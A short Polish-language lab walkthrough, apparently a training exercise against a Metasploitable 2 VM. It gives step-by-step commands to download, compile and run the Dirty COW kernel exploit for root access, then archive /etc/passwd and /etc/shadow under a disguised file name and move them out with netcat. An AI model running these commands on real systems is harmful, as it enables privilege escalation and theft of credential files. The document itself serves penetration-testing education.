Środowisko:

- Kali Linux
- Metasploitable 2 VM

1. [Kali Linux] Zaloguj się wykorzystujac login i haslo z cwiczenia 8 => user:user ssh -o HostKeyAlgorithms=+ssh-dss user@[IP metasploitable]
2. [Metasploitable 2 VM] Sprawdź wersje kernela => uname -a
3. [Metasploitable 2 VM] pobierz exploit umożliwiający privilige escalation - https://www.exploit-db.com/exploits/40839
4. [Metasploitable 2 VM] cat 40839 | grep gcc => jak skompilowac
5. [Metasploitable 2 VM] mv 40839 dirty.c
6. [Metasploitable 2 VM] gcc -pthread dirty.c -o dirty -lcrypt
7. [Metasploitable 2 VM] ./dirty
8. [Metasploitable 2 VM] zaloguj sie na nowego usera "firefart" => su firefart
9. [Metasploitable 2 VM] spakuj /etc/passwd i /etc/shadow/ => tar czvf invoices.tar.gz /etc/passwd /etc/shadow
10. [Metasploitable 2 VM] uruchom nasłuchiwanie netcat`a na porcie 4444 ze spakowanym plikiem => nc -lvp 4444 < invoices.tar.gz &
11. [Kali Linux] pobierz plik netcatem na Kali linux => nc -nv [IP metasploitable] 4444 > invoices.tar.gz
12. [Kali Linux] rozpakuj plik => tar xzvf invoices.tar.gz
13. [Kali Linux] Jak sie teraz nazywa konto root?